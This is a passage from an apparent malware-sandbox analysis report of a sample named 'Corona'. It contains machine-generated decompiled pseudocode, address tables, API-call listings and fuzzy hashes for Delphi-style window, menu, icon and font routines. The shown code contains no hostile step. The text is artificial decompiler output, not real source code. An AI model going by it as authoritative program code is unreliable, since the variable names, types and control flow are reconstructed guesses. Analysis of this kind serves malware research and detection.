				char* _t47;
				char* _t52;
				long _t55;
				long _t59;
				struct HINSTANCE__* _t62;
				intOrPtr _t64;
				void* _t69;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t83;
				short _t88;

				_v48 = 0;
				_t69 = __eax;
				_push(_t83);
				_push(0x44cb51);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xffffffd4;
				if( *((char*)(__eax + 0xa4)) != 0) {
					L13:
					_pop(_t77);
					 *[fs:eax] = _t77;
					_push(0x44cb58);
					return E00403E4C( &_v48);
				}
				_t22 =  *0x451028; // 0x452048
				if( *_t22 != 0) {
					goto L13;
				}
				_t23 = E0041A128(E0044CF30, __eax); // executed
				 *(_t69 + 0x40) = _t23;
				 *0x450d08 = L00406294;
				_t26 =  *0x450d28; // 0x44c698
				_t27 =  *0x452664; // 0x400000
				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
					_t62 =  *0x452664; // 0x400000
					 *0x450d14 = _t62;
					_t88 = RegisterClassA(0x450d04);
					if(_t88 == 0) {
						_t64 =  *0x450dd4; // 0x41a46c
						E0040597C(_t64,  &_v48);
						E0040B1B8(_v48, 1);
						E00403888();
					}
				}
				_t29 =  *0x450e7c; // 0x4528f8
				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_t33 =  *0x450e7c; // 0x4528f8
				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
				if(_t88 < 0) {
					asm("adc eax, 0x0");
				}
				_push(_t36);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t37 =  *0x452664; // 0x400000
				_push(_t37);
				_push(0);
				_t7 = _t69 + 0x8c; // 0x20c00044
				_t39 = E0040430C( *_t7);
				_t40 =  *0x450d28; // 0x44c698, executed
				_t41 = E004067F4(_t40, _t39); // executed
				 *(_t69 + 0x30) = _t41;
				_t9 = _t69 + 0x8c; // 0x444b24
				E00403E4C(_t9);
				 *((char*)(_t69 + 0xa4)) = 1;
				_t11 = _t69 + 0x40; // 0x10940000
				_t12 = _t69 + 0x30; // 0xe
				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
				_t47 =  *0x450ef0; // 0x452b14
				if( *_t47 != 0) {
					_t55 = E0044D634(_t69);
					_t13 = _t69 + 0x30; // 0xe
					SendMessageA( *_t13, 0x80, 1, _t55); // executed
					_t59 = E0044D634(_t69);
					_t14 = _t69 + 0x30; // 0xe
					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
				}
				_t15 = _t69 + 0x30; // 0xe
				_t70 = GetSystemMenu( *_t15, "true");
				DeleteMenu(_t70, 0xf030, 0);
				DeleteMenu(_t70, 0xf000, 0);
				_t52 =  *0x450ef0; // 0x452b14
				if( *_t52 != 0) {
					DeleteMenu(_t70, 0xf010, 0);
				}
				goto L13;
			}




























                                  0x0044c9b9
                                  0x0044c9bc
                                  0x0044c9c0
                                  0x0044c9c1
                                  0x0044c9c6
                                  0x0044c9c9
                                  0x0044c9d3
                                  0x0044cb3b
                                  0x0044cb3d
                                  0x0044cb40
                                  0x0044cb43
                                  0x0044cb50
                                  0x0044cb50
                                  0x0044c9d9
                                  0x0044c9e1
                                  0x00000000
                                  0x00000000
                                  0x0044c9ed
                                  0x0044c9f2
                                  0x0044c9fa
                                  0x0044ca03
                                  0x0044ca09
                                  0x0044ca16
                                  0x0044ca18
                                  0x0044ca1d
                                  0x0044ca2c
                                  0x0044ca2f
                                  0x0044ca34
                                  0x0044ca39
                                  0x0044ca48
                                  0x0044ca4d
                                  0x0044ca4d
                                  0x0044ca2f
                                  0x0044ca54
                                  0x0044ca5d
                                  0x0044ca5f
                                  0x0044ca61
                                  0x0044ca61
                                  0x0044ca67
                                  0x0044ca70
                                  0x0044ca72
                                  0x0044ca74
                                  0x0044ca74
                                  0x0044ca77
                                  0x0044ca78
                                  0x0044ca7a
                                  0x0044ca7c
                                  0x0044ca7e
                                  0x0044ca80
                                  0x0044ca85
                                  0x0044ca86
                                  0x0044ca88
                                  0x0044ca8e
                                  0x0044ca9a
                                  0x0044ca9f
                                  0x0044caa4
                                  0x0044caa7
                                  0x0044caad
                                  0x0044cab2
                                  0x0044cab9
                                  0x0044cabf
                                  0x0044cac3
                                  0x0044cac8
                                  0x0044cad0
                                  0x0044cad4
                                  0x0044cae1
                                  0x0044cae5
                                  0x0044caec
                                  0x0044caf4
                                  0x0044caf8
                                  0x0044caf8
                                  0x0044caff
                                  0x0044cb08
                                  0x0044cb12
                                  0x0044cb1f
                                  0x0044cb24
                                  0x0044cb2c
                                  0x0044cb36
                                  0x0044cb36
                                  0x00000000

                                  APIs
                                    • Part of subcall function 0041A128: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041A146
                                  • GetClassInfoA.USER32 ref: 0044CA0F
                                  • RegisterClassA.USER32 ref: 0044CA27
                                    • Part of subcall function 0040597C: LoadStringA.USER32 ref: 004059AD
                                  • SetWindowLongA.USER32 ref: 0044CAC3
                                  • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 0044CAE5
                                  • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,00444A98), ref: 0044CAF8
                                  • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,00444A98), ref: 0044CB03
                                  • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00444A98), ref: 0044CB12
                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00444A98), ref: 0044CB1F
                                  • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00444A98), ref: 0044CB36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                  • String ID: H E
                                  • API String ID: 2103932818-318411991
                                  • Opcode ID: 9c0873b56c7be81a9825c4451f89ff5bc89dba3bc69784d9130987f594d0f79e
                                  • Instruction ID: 7e16a99a90c099530224821c8cc62cb92c3b61364135999837b0ee578208fda6
                                  • Opcode Fuzzy Hash: 9c0873b56c7be81a9825c4451f89ff5bc89dba3bc69784d9130987f594d0f79e
                                  • Instruction Fuzzy Hash: 2A414F74641340AFE751EB69DCC2F6637A8AB45708F14457AF901EB2E3DAB9E800876C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00431EAC, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 411 431eac-431ee3 413 431ee5-431eec 411->413 414 431f58-431f7d GetClassInfoA 411->414 413->414 417 431eee-431ef3 413->417 415 431f7f-431f8a 414->415 416 431f8c-431f8e 414->416 415->416 418 431fbd-431fda call 43207c 415->418 419 431f90-431f98 UnregisterClassA 416->419 420 431f9d-431fb6 RegisterClassA 416->420 421 431ef5-431ef9 417->421 422 431f18-431f53 call 40597c call 40b1f4 call 403888 417->422 431 431fe1-431ff4 GetWindowLongA 418->431 432 431fdc call 40c5c8 418->432 419->420 420->418 425 431fb8 call 40c5c8 420->425 421->422 424 431efb-431f0a call 403288 421->424 422->414 424->422 434 431f0c-431f16 call 434ef4 424->434 425->418 436 432017-432030 call 4084a8 call 435160 call 41c440 431->436 437 431ff6-432006 GetWindowLongA 431->437 432->431 434->414 448 432035-432047 call 42f98c 436->448 437->436 440 432008-432012 SetWindowLongA 437->440 440->436 451 432054-43206c call 403e4c 448->451 452 432049-43204f call 4032f8 448->452 452->451
                                  C-Code - Quality: 84%
                                  			E00431EAC(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t52;
				void* _t53;
				void* _t67;
				intOrPtr _t86;
				intOrPtr _t104;
				intOrPtr _t108;
				void* _t109;
				intOrPtr* _t111;
				void* _t115;

				_t109 = __edi;
				_t94 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t111 = __eax;
				_push(_t115);
				_push(0x43206d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t115 + 0xffffff40;
				_t95 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t111 + 0x174)) = _v108.lpfnWndProc;
					_t52 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t53 = _t52 + 1;
					if(_t53 == 0 || E0042B5E8 != _v184.lpfnWndProc) {
						if(_t53 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E0042B5E8;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040C5C8(_t94, _t95, _t109, _t111);
						}
					}
					 *0x4509d4 = _t111;
					_t96 =  *_t111; // executed
					 *((intOrPtr*)( *_t111 + 0x9c))();
					if( *(_t111 + 0x180) == 0) {
						E0040C5C8(_t94, _t96, _t109, _t111);
					}
					if((GetWindowLongA( *(_t111 + 0x180), 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA( *(_t111 + 0x180), 0xfffffff4) == 0) {
						SetWindowLongA( *(_t111 + 0x180), 0xfffffff4,  *(_t111 + 0x180));
					}
					E004084A8( *((intOrPtr*)(_t111 + 0x64)));
					 *((intOrPtr*)(_t111 + 0x64)) = 0;
					E00435160(_t111);
					_t67 = E0041C440( *((intOrPtr*)(_t111 + 0x68)), _t94, _t96); // executed
					E0042F98C(_t111, _t67, 0x30, 1);
					_t130 =  *((char*)(_t111 + 0x5c));
					if( *((char*)(_t111 + 0x5c)) != 0) {
						E004032F8(_t111, _t130);
					}
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(0x432074);
					return E00403E4C( &_v196);
				} else {
					_t94 =  *((intOrPtr*)(__eax + 4));
					if(_t94 == 0 || ( *(_t94 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t111 + 8));
						_v188 = 0xb;
						_t86 =  *0x451004; // 0x41a47c
						E0040597C(_t86,  &_v196);
						_t95 = _v196;
						E0040B1F4(_t94, _v196, 1, _t109, _t111, 0,  &_v192);
						E00403888();
					} else {
						_t108 =  *0x42abf0; // 0x42ac3c
						if(E00403288(_t94, _t108) == 0) {
							goto L6;
						}
						_v116 = E00434EF4(_t94);
					}
					goto L7;
				}
			}





















                                  0x00431eac
                                  0x00431eac
                                  0x00431eb5
                                  0x00431eb9
                                  0x00431ebf
                                  0x00431ec3
                                  0x00431ec4
                                  0x00431ec9
                                  0x00431ecc
                                  0x00431ed7
                                  0x00431ed9
                                  0x00431ee3
                                  0x00431f58
                                  0x00431f5b
                                  0x00431f70
                                  0x00431f78
                                  0x00431f7a
                                  0x00431f7d
                                  0x00431f8e
                                  0x00431f98
                                  0x00431f98
                                  0x00431f9d
                                  0x00431fa7
                                  0x00431fb6
                                  0x00431fb8
                                  0x00431fb8
                                  0x00431fb6
                                  0x00431fbd
                                  0x00431fcb
                                  0x00431fcd
                                  0x00431fda
                                  0x00431fdc
                                  0x00431fdc
                                  0x00431ff4
                                  0x00432012
                                  0x00432012
                                  0x0043201a
                                  0x00432021
                                  0x00432026
                                  0x00432030
                                  0x0043203e
                                  0x00432043
                                  0x00432047
                                  0x0043204f
                                  0x0043204f
                                  0x00432056
                                  0x00432059
                                  0x0043205c
                                  0x0043206c
                                  0x00431eee
                                  0x00431eee
                                  0x00431ef3
                                  0x00431f18
                                  0x00431f1b
                                  0x00431f21
                                  0x00431f37
                                  0x00431f3c
                                  0x00431f41
                                  0x00431f4e
                                  0x00431f53
                                  0x00431efb
                                  0x00431efd
                                  0x00431f0a
                                  0x00000000
                                  0x00000000
                                  0x00431f13
                                  0x00431f13
                                  0x00000000
                                  0x00431ef3

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: ClassLongWindow$InfoRegisterUnregister
                                  • String ID: @
                                  • API String ID: 717780171-2766056989
                                  • Opcode ID: e363a83fe742b6d0208d1c73613e69ac5f4bd8b3060d6cd5570c2bfc466fe7ca
                                  • Instruction ID: 2696768af14e9da2e08b9c4245764d4c66f34b8d60f6e5989b72d2a42a9c3d82
                                  • Opcode Fuzzy Hash: e363a83fe742b6d0208d1c73613e69ac5f4bd8b3060d6cd5570c2bfc466fe7ca
                                  • Instruction Fuzzy Hash: 415180716003589BDB20DB69CC81B9EB7F9AF08308F50457EF859E72A1DB38AD44CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044C6A8, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 94%
                                  			E0044C6A8(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HINSTANCE__** _t53;
				struct HICON__* _t55;
				intOrPtr _t58;
				struct HINSTANCE__** _t60;
				void* _t67;
				char* _t69;
				char* _t75;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				char _t93;
				void* _t104;
				void* _t105;

				_t93 = __edx;
				_t91 = __ecx;
				if(__edx != 0) {
					_t105 = _t105 + 0xfffffff0;
					_t39 = E00403420(_t39, _t104);
				}
				_v5 = _t93;
				_t90 = _t39;
				E00419098(_t91, 0);
				_t42 =  *0x450f38; // 0x4503c4
				if( *((short*)(_t42 + 2)) == 0) {
					_t89 =  *0x450f38; // 0x4503c4
					 *((intOrPtr*)(_t89 + 4)) = _t90;
					 *_t89 = 0x44dd80;
				}
				_t43 =  *0x450fe4; // 0x4503cc
				if( *((short*)(_t43 + 2)) == 0) {
					_t88 =  *0x450fe4; // 0x4503cc
					 *((intOrPtr*)(_t88 + 4)) = _t90;
					 *_t88 = E0044DF78;
				}
				 *((char*)(_t90 + 0x34)) = 0;
				 *((intOrPtr*)(_t90 + 0x90)) = E004030CC(1);
				 *((intOrPtr*)(_t90 + 0xa8)) = E004030CC(1);
				 *((intOrPtr*)(_t90 + 0x60)) = 0;
				 *((intOrPtr*)(_t90 + 0x84)) = 0;
				 *((intOrPtr*)(_t90 + 0x5c)) = 0xff000018;
				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
				 *((char*)(_t90 + 0x7c)) = 1;
				 *((intOrPtr*)(_t90 + 0x80)) = 0;
				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
				 *((char*)(_t90 + 0x88)) = 0;
				 *((char*)(_t90 + 0x9d)) = 1;
				 *((char*)(_t90 + 0xb4)) = 1;
				_t103 = E00422924(1);
				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
				_t53 =  *0x450e60; // 0x45202c
				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
				E00422CF4(_t103, _t55);
				_t20 = _t90 + 0x98; // 0x736d
				_t58 =  *_t20;
				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
				 *((intOrPtr*)(_t58 + 0x10)) = 0x44e518;
				_t60 =  *0x450e60; // 0x45202c
				GetModuleFileNameA( *_t60,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t67 = E0040BF80(0x5c);
				if(_t67 != 0) {
					_t27 = _t67 + 1; // 0x1
					E004082AC( &_v261, _t27);
				}
				_t69 = E0040BFA8( &_v261, 0x2e);
				if(_t69 != 0) {
					 *_t69 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t31 = _t90 + 0x8c; // 0x444b24
				E004040BC(_t31, 0x100,  &_v261);
				_t75 =  *0x450d58; // 0x452034
				if( *_t75 == 0) {
					E0044C9B0(_t90, _t90, 0x100); // executed
				}
				 *((char*)(_t90 + 0x59)) = 1;
				 *((char*)(_t90 + 0x5a)) = 1;
				 *((char*)(_t90 + 0x5b)) = 1;
				 *((char*)(_t90 + 0x9e)) = 1;
				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
				E0044E6F4(_t90, 0x100);
				E0044F0B8(_t90);
				_t81 = _t90;
				if(_v5 != 0) {
					E00403478(_t81);
					_pop( *[fs:0x0]);
				}
				return _t90;
			}

























                                  0x0044c6a8
                                  0x0044c6a8
                                  0x0044c6b5
                                  0x0044c6b7
                                  0x0044c6ba
                                  0x0044c6ba
                                  0x0044c6bf
                                  0x0044c6c2
                                  0x0044c6c8
                                  0x0044c6cd
                                  0x0044c6d7
                                  0x0044c6d9
                                  0x0044c6de
                                  0x0044c6e1
                                  0x0044c6e1
                                  0x0044c6e7
                                  0x0044c6f1
                                  0x0044c6f3
                                  0x0044c6f8
                                  0x0044c6fb
                                  0x0044c6fb
                                  0x0044c701
                                  0x0044c711
                                  0x0044c723
                                  0x0044c72b
                                  0x0044c730
                                  0x0044c736
                                  0x0044c73d
                                  0x0044c744
                                  0x0044c74a
                                  0x0044c750
                                  0x0044c757
                                  0x0044c75e
                                  0x0044c765
                                  0x0044c778
                                  0x0044c77a
                                  0x0044c785
                                  0x0044c78d
                                  0x0044c796
                                  0x0044c79b
                                  0x0044c79b
                                  0x0044c7a1
                                  0x0044c7a4
                                  0x0044c7b7
                                  0x0044c7bf
                                  0x0044c7d2
                                  0x0044c7df
                                  0x0044c7e6
                                  0x0044c7e8
                                  0x0044c7f1
                                  0x0044c7f1
                                  0x0044c7fe
                                  0x0044c805
                                  0x0044c807
                                  0x0044c807
                                  0x0044c812
                                  0x0044c817
                                  0x0044c828
                                  0x0044c82d
                                  0x0044c835
                                  0x0044c839
                                  0x0044c839
                                  0x0044c83e
                                  0x0044c842
                                  0x0044c846
                                  0x0044c84a
                                  0x0044c853
                                  0x0044c85b
                                  0x0044c862
                                  0x0044c867
                                  0x0044c86d
                                  0x0044c86f
                                  0x0044c874
                                  0x0044c87b
                                  0x0044c885

                                  APIs
                                  • LoadIconA.USER32(00400000,MAINICON), ref: 0044C78D
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00439C40,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 0044C7BF
                                  • OemToCharA.USER32(?,?), ref: 0044C7D2
                                  • CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00439C40,00000000,00000000,?,00000000,?,00000000,00439CA8), ref: 0044C812
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Char$FileIconLoadLowerModuleName
                                  • String ID: , E$4 E$MAINICON
                                  • API String ID: 3935243913-3115775848
                                  • Opcode ID: 2e7641ec6f783780665d8e810a51c97b635d9958c5ef7161830123da460a768d
                                  • Instruction ID: 6ee070d7603dc0e8e4ded7314cca8777ca8a6862e1012d6af4779427f1637a19
                                  • Opcode Fuzzy Hash: 2e7641ec6f783780665d8e810a51c97b635d9958c5ef7161830123da460a768d
                                  • Instruction Fuzzy Hash: A45160706042449FE751EF39D8C5B853BE4AB15308F4440BAE848DF397D7BAD948CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044BDA0, Relevance: 10.6, APIs: 7, Instructions: 89COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 89%
                                  			E0044BDA0(void* __eax, void* __ebx, void* __ecx, void* __edi) {
				char _v5;
				struct tagLOGFONTA _v65;
				struct tagLOGFONTA _v185;
				struct tagLOGFONTA _v245;
				void _v405;
				void* _t23;
				int _t27;
				void* _t30;
				intOrPtr _t38;
				struct HFONT__* _t41;
				struct HFONT__* _t45;
				struct HFONT__* _t49;
				intOrPtr _t52;
				intOrPtr _t54;
				void* _t57;
				void* _t72;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t72 = __edi;
				_t74 = _t75;
				_t76 = _t75 + 0xfffffe6c;
				_t57 = __eax;
				_v5 = 0;
				if( *0x452bb0 != 0) {
					_t54 =  *0x452bb0; // 0x2131714
					_v5 =  *((intOrPtr*)(_t54 + 0x88));
				}
				_push(_t74);
				_push(0x44bee5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *0x452bb0 != 0) {
					_t52 =  *0x452bb0; // 0x2131714
					E0044E290(_t52, 0);
				}
				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
					_t23 = GetStockObject(0xd);
					_t7 = _t57 + 0x84; // 0x38004010
					E0041C5E8( *_t7, _t23, _t72);
				} else {
					_t49 = CreateFontIndirectA( &_v65); // executed
					_t6 = _t57 + 0x84; // 0x38004010
					E0041C5E8( *_t6, _t49, _t72);
				}
				_v405 = 0x154;
				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
				if(_t27 == 0) {
					_t14 = _t57 + 0x80; // 0x94000000
					E0041C6CC( *_t14, 8);
					_t30 = GetStockObject(0xd);
					_t15 = _t57 + 0x88; // 0x90000000
					E0041C5E8( *_t15, _t30, _t72);
				} else {
					_t41 = CreateFontIndirectA( &_v185);
					_t11 = _t57 + 0x80; // 0x94000000
					E0041C5E8( *_t11, _t41, _t72);
					_t45 = CreateFontIndirectA( &_v245);
					_t13 = _t57 + 0x88; // 0x90000000
					E0041C5E8( *_t13, _t45, _t72);
				}
				_t16 = _t57 + 0x80; // 0x94000000
				E0041C42C( *_t16, 0xff000017);
				_t17 = _t57 + 0x88; // 0x90000000
				E0041C42C( *_t17, 0xff000007);
				 *[fs:eax] = 0xff000007;
				_push(0x44beec);
				if( *0x452bb0 != 0) {
					_t38 =  *0x452bb0; // 0x2131714
					return E0044E290(_t38, _v5);
				}
				return 0;
			}






















                                  0x0044bda0
                                  0x0044bda1
                                  0x0044bda3
                                  0x0044bdaa
                                  0x0044bdac
                                  0x0044bdb7
                                  0x0044bdb9
                                  0x0044bdc4
                                  0x0044bdc4
                                  0x0044bdc9
                                  0x0044bdca
                                  0x0044bdcf
                                  0x0044bdd2
                                  0x0044bddc
                                  0x0044bde0
                                  0x0044bde5
                                  0x0044bde5
                                  0x0044bdfb
                                  0x0044be17
                                  0x0044be1e
                                  0x0044be24
                                  0x0044bdfd
                                  0x0044be01
                                  0x0044be08
                                  0x0044be0e
                                  0x0044be0e
                                  0x0044be29
                                  0x0044be40
                                  0x0044be47
                                  0x0044be7d
                                  0x0044be88
                                  0x0044be8f
                                  0x0044be96
                                  0x0044be9c
                                  0x0044be49
                                  0x0044be50
                                  0x0044be57
                                  0x0044be5d
                                  0x0044be69
                                  0x0044be70
                                  0x0044be76
                                  0x0044be76
                                  0x0044bea1
                                  0x0044beac
                                  0x0044beb1
                                  0x0044bebc
                                  0x0044bec6
                                  0x0044bec9
                                  0x0044bed5
                                  0x0044beda
                                  0x00000000
                                  0x0044bedf
                                  0x0044bee4

                                  APIs
                                  • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 0044BDF4
                                  • CreateFontIndirectA.GDI32(?), ref: 0044BE01
                                  • GetStockObject.GDI32(0000000D), ref: 0044BE17
                                    • Part of subcall function 0041C6CC: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041C6D9
                                  • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 0044BE40
                                  • CreateFontIndirectA.GDI32(?), ref: 0044BE50
                                  • CreateFontIndirectA.GDI32(?), ref: 0044BE69
                                  • GetStockObject.GDI32(0000000D), ref: 0044BE8F
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                  • String ID:
                                  • API String ID: 2891467149-0
                                  • Opcode ID: 406b453e2eb96f88e208c54938b37e875b627c301bb8c47082f7830c41cc4f16
                                  • Instruction ID: 13048d095b05e568d88b2462bdf880b39143dba53368d4fab1f71bf1c901f1df
                                  • Opcode Fuzzy Hash: 406b453e2eb96f88e208c54938b37e875b627c301bb8c47082f7830c41cc4f16
                                  • Instruction Fuzzy Hash: 4F31A3307442449BFB50EB69CC82BDA73E9EB45304F5044B7BA08DB297DB78E844C729
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00446AE8, Relevance: 7.7, APIs: 5, Instructions: 171COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 526 446ae8-446b41 call 4317f8 call 430f54 530 446b46-446b50 526->530 531 446b56-446b60 530->531 532 446cb2-446cbd 530->532 531->532 533 446b66-446b70 531->533 534 446cbf-446cc4 call 42e210 532->534 535 446cc9-446cd4 532->535 536 446bb5-446bdb call 446e70 533->536 537 446b72-446b84 533->537 534->535 539 446cd6-446cdb call 42e254 535->539 540 446ce0-446cf1 535->540 536->532 553 446be1-446c0c call 446148 call 4349b8 536->553 537->536 541 446b86-446bb0 call 41c60c MulDiv call 41c614 537->541 539->540 544 446d17-446d3d call 42f98c call 431800 540->544 545 446cf3-446d12 call 446148 call 4349b8 540->545 541->536 545->544 562 446c31-446c3b 553->562 563 446c0e-446c2b MulDiv 553->563 564 446c60-446c6a 562->564 565 446c3d-446c5a MulDiv 562->565 563->562 564->532 566 446c6c-446cac MulDiv * 2 564->566 565->564 566->532
                                  C-Code - Quality: 89%
                                  			E00446AE8(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t202 = _t203;
				_v8 = __eax;
				E004317F8(_v8);
				_push(_t203);
				_push(0x446d3e);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x452661; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E00430F54(_v8, 0, __edx, _t204); // executed
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E0042E210(_v8, _t98, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E0042E254(_v8, _t100, _t214);
					}
					_t180 =  *0x446d4c; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E00446148(_v8, 1, 1);
						E004349B8(_v8, 1, 1, _t215);
					}
					E0042F98C(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0x446d45);
					return E00431800(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
